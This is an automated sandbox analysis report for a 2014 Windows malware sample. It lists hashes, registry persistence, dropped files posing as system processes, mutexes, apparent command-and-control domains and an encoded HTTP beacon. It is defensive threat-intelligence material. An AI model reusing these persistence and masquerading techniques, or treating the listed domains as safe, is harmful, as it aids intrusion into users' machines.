Analysis Date: 2014-06-20 13:38:38
MD5: 525e8f8fcf8bef282a944b02beee5255
SHA1: 88daebfb4fcda24474d4bee5dd50aa61a6ed0f39

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: 264f9b01fdefb58671fd8e6492c92b12 sha1: 08c1013bba5558c7e66d92c0b71418b4f7406adc size: 199680
Section .rdata md5: b2922bf5d49e010b950b305c9bece236 sha1: fec7885dd13fd388636eca7c1f22f2e9ccf7e169 size: 2048
Section .data md5: 7d657c3d6b7cc32bebca2df4aae3c7b5 sha1: 27591ea3ce63274b9a6c7e4dc49779486218e23d size: 15872
Section .tls md5: 2c6b4870ad5611a44e500d62d1dacc6f sha1: dfe8da88d1a013c9e926404369d1b799a4d1c7de size: 512
Timestamp: 2005-09-20 12:04:25
Version: PrivateBuild: 1544
PEhash: 016d3552844d5c0f2c0a98c101196276fdb7c1bc
IMPhash: 61e0ee3745469d565557aba054d8a05c

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: pdasoftstorage.com
Winsock DNS: 127.0.0.1
Winsock DNS: happyaladdin.com
Winsock DNS: onlinebizdirectory.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: onlinebizdirectory.com
Type: A
184.168.66.121
DNS: pdasoftstorage.com
Type: A
DNS: happyaladdin.com
Type: A
HTTP GET: http://onlinebizdirectory.com/images/PowerHideBanner.gif?v8=58&tq=gJ4WK%2FSUh6zGhRMw9YLJoMSTUivqg4asw5JEfqHXarVJ%2BQhhWFc%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 184.168.66.121:80

Raw Pcap
Strings

040904b0
1544
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
BeginPaint
CallWindowProcA
CharNextA
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateFiber
CreateWindowExA
@.data
DefWindowProcA
DestroyWindow
EndPaint
EnumResourceNamesA
EqualRect
ExitProcess
GetACP
GetClassInfoExA
GetClientRect
GetCommandLineA
GetFocus
GetKeyState
GetLocaleInfoA
GetParent
GetProcAddress
GetSystemInfo
GetWindowLongA
HeapAlloc
HeapCreate
HeapDestroy
HeapReAlloc
HeapSize
InterlockedCompareExchange
IntersectRect
InvalidateRect
IsChild
IsDebuggerPresent
IsProcessorFeaturePresent
IsWindow
KERNEL32.dll
LoadCursorA
LoadLibraryA
OffsetRect
PtInRect
`.rdata
RealGetWindowClassA
RegisterClassExA
ReleaseDC
Rich`x
RtlUnwind
SetFocus
SetThreadPriority
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SetWindowLongA
SetWindowPos
SetWindowRgn
ShowWindow
SuspendThread
TerminateProcess
!This program cannot be run in DOS mode.
UnhandledExceptionFilter
UnionRect
UnregisterClassA
USER32.dll
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
WriteFile
wsprintfA